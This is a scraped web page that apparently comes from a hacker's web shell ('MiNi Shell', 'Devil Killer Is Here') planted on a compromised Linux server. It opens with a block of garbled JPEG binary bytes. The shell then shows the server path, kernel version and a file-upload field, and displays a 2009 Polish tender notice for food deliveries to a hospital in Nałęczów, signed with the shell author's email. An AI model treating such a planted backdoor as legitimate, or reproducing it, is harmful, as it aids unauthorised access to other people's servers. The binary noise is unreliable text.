JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090317/65396-N-2009.html

<p class="kh_header"><b>Nałęczów: cykliczne dostawy artykułów spożywczych na potrzeby żywieniowe Szpitala w okresie 12 miesięcy 2009/2010</b><br>
<b>Numer ogłoszenia: 65396 - 2009; data zamieszczenia: 17.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kolejowy Szpital Uzdrowiskowy w Nałęczowie SP ZOZ , ul. Górskiego 6, 24-140 Nałęczów, woj. lubelskie, tel. 081 5014208 wew. 32, faks 081 5014302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ebip.lublin.pl/5/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> cykliczne dostawy artykułów spożywczych na potrzeby żywieniowe Szpitala w okresie 12 miesięcy 2009/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik Nr 2





Zapotrzebowanie w okresie 12 miesięcy 2009/2010

kasze, mąki 
l. p.	asortyment/gramatura	j.m.	ilość
1	2	3	4
1	Kasza jęczmienna a 1 kg 	kg	300
2.	Kasza manna a 1kg 	kg	160
3.	Kasza gryczana a 1kg 	kg	180
4.	Ryż biały a 1 kg	kg	820
5.	Ryż długoziarnisty typu Knorr porboiled a 1 kg	kg	350
6.	Płatki owsiane a ? kg 	kg	140
7.	Mąka ziemniaczana a 1 kg	kg	100
8	Kasza jaglana a 1 kg 	kg	100
9.	Mąka pszenna typ 450	kg	2100
10.	Płatki kukurydziane 	kg	120
11.	Płatki ryżowe a 0,50 kg 	kg	20
Makarony, przyprawy, dodatki 
l. p.	asortyment/gramatura	j.m.	ilość
1	2	3	4
1.	Makaron różny a 1 kg, (lubelski lub inny o podobnych parametrach typu spaghetti, łazanka, nitka, wstążka )	kg	1000
2.	Bułka tarta a 0,5 kg, typu wrocławska-mamut	kg	300
3.	Zupa porowa 1kg	kg	12
4	Cukier biały a 1 kg 	kg	3400
5.	Cukier puder a 0,4 kg, 	kg	180
6.	Miód naturalny, porcjowany a 25 g 	szt.	16000
7.	Miód naturalny wielokwiatowy a 0,4 kg 	kg	50
8.	Majonez a, 1kg 	kg	800
9.	Majonez a, 0,3kg	szt.	220
10.	Sałatka wielowarzywna a 0,9 l 	szt.	130
11.	Przyprawa do drobiu a 1 kg typu Delikat	szt.     	14
12.	Chrzan tarty 0,9 kg, 	szt.	220
13.	Cynamon a 20 g	szt.	175
14.	Przyprawa do mięs 1 kg typu Delikat	szt.	12
15.	Chrzan tarty a 0,3 kg	szt.	120
16.	Papryka konserwowa a 0,9 kg	szt.	320
17.	Peperonata paprykowa a 3,2 kg
Kolorowa papryka cięta w zalewie pomidorowej typu Knorr - kuchnia włoska 	szt.	30
18.	Kukurydza konserwowa a 2,60 kg	szt	140
19.	Kukurydza konserwowa a 0,40	szt.	340
20.	Herbata expr. (typu Saga lub inna o podobnych parametrach, oryginalna cejlońska) a 100 szt. 	op.	1200
21.	Przyprawa w płynie Winiary lub inna o podobnych parametrach a 1 l	l.	450
22	Przyprawa w płynie Winiary lub inna o podobnych parametrach a 200 ml	szt.	60
23.	Majeranek a 1 kg,  	szt.	12
24	Żelatyna a 1 kg	kg 	85
25.	Pieprz naturalny a 1 kg 	szt.	27
26.	Pieprz ziołowy a 0,5 kg 	szt.	5
27.	Ziele angielski a ? kg 	szt.	5
28.	Liście laurowe a 0,3 kg 	szt.  	8
29.	Kwasek cytrynowy a 1 kg	szt.	24
30. 	Sól a 1 kg 	kg	900
31.	Kakao a 0,1 kg, 0,2 kg	kg	40
32.	Cukier wanilinowy a 0,02 kg	szt.	850
33.	Suchary a 300 g	szt.	40
34.	Kawa Inka a 0,15 kg	szt.	360
35.	Ocet spirytusowy ? l.	szt.	200
36.	Koncentrat barszczu a 0,30 kg	szt.	60
37.	Sos myśliwski 1,5 kg 	kg	3
38.	Proszek do pieczenia a 30 g	szt.	650
39.	Żurek, barszcz biały 1 kg	kg	20
40.	Bulion grzybowy a 0,7 kg	szt.	2
41.	Soda oczyszczana a 70 g	szt.	80
42.	Aromaty mix a 10 ml	szt.	280
43.	Barszcz czerwony a 1 kg	kg	20
44.	Sos pieczeniowy ciemny a 1 kg	kg	20
45.	Sos neapolitański 	kg	10
46.	Zupa gulaszowa 	kg	6
47.	Sos do drobiu a 1 kg 	kg	4
48.	Zupa pomidorowa a 1 kg 	szt.	6
49.	Rosół drobiowo-wołowy a 1 kg 	szt. 	8
50.	Zupa selerowa a 1 kg 	kg	20
51.	Zupa ogonowa a 1kg	kg	8
52.	Zupa pieczarkowa a 1 kg 	kg	14
53.	Zupa cebulowa a 1 kg 	kg	60
54.	Zupa grzybowa a 1 kg 	kg	18
55.	Zupa grochowa a 1 kg	kg	12
56.	Sos ogrodowy a 1 kg (sałatkowy)	kg	35
57.	Sos grzybowy a 1 kg 	kg	12
58.	Papryka mielona a 0,5 kg, 1 kg	szt.	12
59.	Przyprawa do ryb a 0,7 kg typu Delikat	szt.	12
60.	Groszek ptysiowy a 1 kg 	kg	70
61.	Przyprawa do pierników a 0,02	szt.	400
62.	Cukier w kostkach a 0,5 kg	kg	15
63.	Rosół drobiowy 60 g	szt.	100
64.	Rosół wołowy 60g	szt.	50
65.	Fasolka biała konserwowa a 400g	szt.	24
66.	Fasolka konserwowa mieszanka a 400g	szt	36
67.	Groch łupany 0,50 kg 	szt	70
68.	Musztarda a 1kg	kg	300
69.	Musztarda a 0,20 kg	szt	240


Przetwory owocowo - warzywne 
l. p.	asortyment/gramatura	j.m.	ilość
1	2	3	4
1.	Przecier pomidorowy (Pudliszki lub inny o podobnych parametrach) a 1kg	kg	260
2.	Przecier pomidorowy (Pudliszki lub inny o podobnych parametrach) a 0,20 kg	kg	150
3.	Dżem owocowy ( Tarczyn, lub inny o podobnych parametrach) a 1kg  mix	kg	50
4.	Dżem porcjowany a 0,25 g mix	szt.	16000
5.	Sok grejpfrutowy  a 1 l typu Tarczyn, Fortuna 	szt.	120
6.	Sok pomarańczowy typu Fortuna Tarczyn a 1 l	szt.	60
7.	Sok jabłkowy typu Tarczyn, Fortuna a 1 l	szt.	80
8.	Sok pomidorowy a 1 l  	szt.	280
9.	Marmolada twarda a 0,90 kg 	szt.	30
10.	Groszek konserwowy a, 2,6 kg 	szt.	150
11.	Keczup a 1 kg 	szt.	350
12.	Keczup a 0,5 kg	szt.	170
13.	Pomidor w zalewie a 2 kg	szt.	130
14.	Syrop owocowy a ? l, typu Herbapol 	szt.	240
15.	Rodzynki a 0,2 kg 	kg	130
16.	Orzech włoski a 0,2 kg	szt.	300
17.	Ananasy konserwowe a 0,58 kg  plastry	szt.	250
18.	Brzoskwinie konserwowe a 0,85 kg	szt.	80
19.	Kotlet sojowy a 0,1 kg	szt.	200
20.	Powidła śliwkowe a 0,90 l	szt.	30
21.	Płatki migdałowe a 1 kg	kg	5
22.	Śliwka suszona a 0,1 kg  	kg	24
23.	Morele suszone a 0,1 kg 	kg	20
24.	Wiórki kokosowe a 0,1 kg	kg	5
25.	Kisiel (Winiary lub inny o podobnych parametrach) a 1 kg	kg	140
26.	Budyń (Winiary lub inny o podobnych parametrach) a 1 kg 	kg	120
27.	Galaretka (Winiary lub inna o podobnych parametrach) a 1 kg	kg	10
28.	Czosnek mielony 0,5 kg 	szt.	24
29.	Jarzynka a 1 kg	szt.	120
30.	Pieczarki konserwowe a 0,9 kg	szt.	80
31.	Ogórki konserwowe a 0,9 kg	szt.	600
32.	Gruszki w syropie a 850 g	szt.	36
33.	Seler konserwowy a 0,24 kg	szt.	1200
34.	Koper suszony a 0,50 kg	szt.	6
35.	Fasola czerwona a 2,60 kg	szt.	50
36.	Fasola czerwona a 0,40 kg	szt.	120
37.	Mak niebieski a 0,25 kg	kg	45
38.	Kminek a 0,02 kg 	szt.	25
39.	Ziarenka smaku a 0,2 kg	szt.	350
40.	Aroma mix ziołowo maślana a 1,2 kg	szt.	30
41.	Przyprawa do flaków a 0,50 kg 	szt.	10
42.	Groszek zielony a 0,40 kg	szt	240
43.	Mieszanka skórek a 100g	szt	30
44.	Koktajl tropikalny a 425 g 	szt	48
45.	Oliwki zielone z papryką a 900g	szt	20
46.	Daktyle drylowane a 100g	szt	50
47.	Figi suszone a 200g 	szt	50
48.	Migdały 	kg	4
49.	Gałka muszkatołowa 0,02 kg	szt	75
50.	Imbir 0,02 kg	szt	75
51.	Pomidorina a 2,60 kg	szt	30
52.	Skórka pomarańczowa a 100g	szt	150



Tłuszcze roślinne 
l. p.	asortyment/gramatura	j.m.	ilość
1	2	3	4
1.	Margaryna typu Śniadaniowa a 0,5 kg	kg	1100
2.	Margaryna typu Bielska a 0,25 kg	kg	850
3.	Olej a 0,9l, 	szt.	750
4.	Olej a ? l 	szt.	200
5.	Masło roślinne kubek a 0,25 kg 	kg	60

W celu wyjaśnienie nazewnictwa - w przypadku użycia nazwy handlowej poszczególnych artykułów, proszę o kontakt telefoniczny z Punktem Żywienia pod nr 0815014208 wew. 27 lub 47, osoba do kontaktu - Pan Witold Skałecki - Kierownik Punktu Żywienia.   
















Kolejowy Szpital Uzdrowiskowy w Nałęczowie SP ZOZ
 Marzec 2009.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.89.40.00-1, 15.61.33.00-1, 15.87.00.00-7, 15.33.00.00-0, 15.41.22.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:

1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
  
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:

2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.

2.6 nie zgodzili się na przedłużenie okresu związania ofertą 
2.7Inne podstawy wykluczenia wykonawców

3. Zamawiający odrzuca ofertę jeżeli:

3.1 jest niezgodną z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
3.2 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.3 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.4 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert 
3.5 zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88 Prawa zamówień publicznych, lub błędy w obliczeniu ceny 
3.6 wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny 
3.7 jest nieważna na podstawie odrębnych przepisów, 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia,niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:

a.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
a.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę 
a.3) Projekt umowy  

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
  B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.2) Dokumenty potwierdzające posiadanie uprawnień,pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
  B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
   B.6) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych.   
  C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 

c.1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że dostawy lub usługi te zostały wykonane należycie.  

 D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 

d.2) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

  E.1) Zamiast dokumentów, o których mowa w pkt. B.1), B.3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 


  -Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   


F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

F.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy

  - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B, C, D, dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   


G. Postanowienia dotyczące składanych dokumentów

G.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.

G.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/5/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kolejowy Szpital Uzdrowiskowy w Nałęczowie SPZOZ
ul. Górskiego 6
24-140 Nałęczów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 10:00, miejsce: Kolejowy Szpital Uzdrowiskowy w Nałęczowie SPZOZ
Górskiego 6
24-140 Nałęczów
pok. nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com